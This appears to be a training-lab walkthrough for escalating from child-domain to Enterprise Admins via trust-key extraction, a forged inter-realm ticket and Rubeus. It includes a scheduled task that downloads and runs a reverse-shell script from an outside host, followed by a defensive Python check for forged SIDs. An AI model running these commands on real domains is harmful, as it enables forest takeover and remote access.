This walkthrough shows a way to escalate from Domain Admins to Enterprise Admins.
First, let’s extract the trust keys using BetterSafetyKatz:
.\BetterSafetyKatz.exe '"lsadump::trust /patch"' "exit"

Now let’s use BetterSafetyKatz to forge the ticket. The /rc4 value is the trust key extracted above, and the /sids value is the SID the forged ticket carries in addition to the user's own (RID 519 is Enterprise Admins):
BetterSafetyKatz.exe '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /rc4:68a7f836e94f9668b8a215d486f23a38 /service:krbtgt /ticket:c:\ad\tools\trust.kirbi"' "exit"

The ticket is now saved.
Let’s pass the ticket using Rubeus:
Rubeus.exe asktgs /service:http/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ticket:c:\ad\tools\trust.kirbi /ptt

Now let’s list our tickets:
klist

Let’s create a scheduled task on the moneycorp domain controller:
schtasks /create /S mcorp-dc.moneycorp.local /SC Weekly /RU "mcorp\Administrator" /TN "STCheck" /TR "powershell.exe -c 'IEX(New-Object System.Net.WebClient).DownloadString(''http://172.16.100.22/Invoke-PowerShellTcp.ps1''')'"
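
A defender-side check for the forged ticket above, as an added example that is not part of the original walkthrough: the telltale is the /sids value, an extra SID with a privileged RID such as 519 (Enterprise Admins) whose domain part differs from the account's own domain SID. It assumes the PAC's account domain SID and extra SIDs have already been decoded by other tooling; the function names and the benign sample SIDs are constructed.

```python
# Added example (not from the original page). Assumption: the ticket's PAC has
# already been decoded elsewhere into an account domain SID and a list of extra SIDs.

# Well-known domain-relative RIDs of privileged groups.
PRIVILEGED_RIDS = {
    512: "Domain Admins",
    516: "Domain Controllers",
    518: "Schema Admins",
    519: "Enterprise Admins",
}


def split_sid(sid):
    """Return (domain_sid, rid) for S-1-5-21-a-b-c-rid, else (None, None)."""
    parts = sid.strip().upper().split("-")
    if len(parts) != 8 or parts[:4] != ["S", "1", "5", "21"]:
        return None, None
    if not all(p.isdigit() for p in parts[4:]):
        return None, None
    return "-".join(parts[:7]), int(parts[7])


def suspicious_extra_sids(account_domain_sid, extra_sids):
    """List extra SIDs that claim a privileged group in a different domain."""
    home = account_domain_sid.strip().upper()
    findings = []
    for sid in extra_sids:
        domain, rid = split_sid(sid)
        if domain is None:          # not a domain-relative SID (e.g. S-1-18-1)
            continue
        if domain != home and rid in PRIVILEGED_RIDS:
            findings.append((sid, PRIVILEGED_RIDS[rid]))
    return findings


if __name__ == "__main__":
    child = "S-1-5-21-719815819-3726368948-3917688648"   # /sid value on this page
    forged = ["S-1-5-21-335606122-960912869-3279953914-519"]  # /sids value on this page
    benign = ["S-1-18-1", child + "-1105",                # constructed samples
              "S-1-5-21-335606122-960912869-3279953914-1105"]
    print("forged:", suspicious_extra_sids(child, forged))
    print("benign:", suspicious_extra_sids(child, benign))
```

A hit is a lead rather than proof: migrated accounts can legitimately carry foreign-domain SIDs in sidHistory, which is why only privileged RIDs are flagged here.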
